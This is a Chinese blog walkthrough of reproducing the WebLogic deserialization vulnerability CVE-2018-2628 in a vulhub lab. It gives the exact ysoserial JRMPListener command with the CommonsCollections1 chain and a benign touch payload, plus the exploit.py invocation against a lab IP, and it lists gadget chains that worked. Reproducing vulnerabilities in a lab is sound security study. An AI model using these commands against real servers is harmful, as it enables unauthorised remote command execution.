当前位置: 首页 > article >正文

【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。
并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。
第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。
这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

在这里插入图片描述

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路


http://www.kler.cn/a/280205.html

相关文章:

  • 在URL链接中指定浏览器跳转到PDF文件的指定页码
  • 智能手机摄影综评:品牌联名与自建影像品牌的战略分析
  • 【微前端】前端微服务框架对比和技术选型
  • AI搜索“懒人神器”,如何向谷歌和百度发起挑战?
  • 双系统ubuntu引导项丢失如何修复
  • 软件上显示“mfc140.dll丢失”错误信息?那么mfc140.dll丢失该如何修复
  • go国内源设置
  • shallowReactive 与 shallowRef
  • MySQL 官方高可用方案 InnoDB Cluster
  • Ubuntu 16.04下Firefox版本更新
  • 远程控制电脑的软件有哪些?精选4个小妙招分享!
  • C# 使用 StackExchange nuget 包进行 Redis操作
  • 设计模式 2 抽象工厂模式
  • 适合 Spring Boot 3.0x的Redis 分布式锁
  • docker应用
  • Java笔试面试题之多线程偏门考点总结
  • 算法【单调队列】
  • langchain入门系列之六 使用langchain构建PDF解析助手
  • consul 运维中遇到的问题
  • c++86 文件读取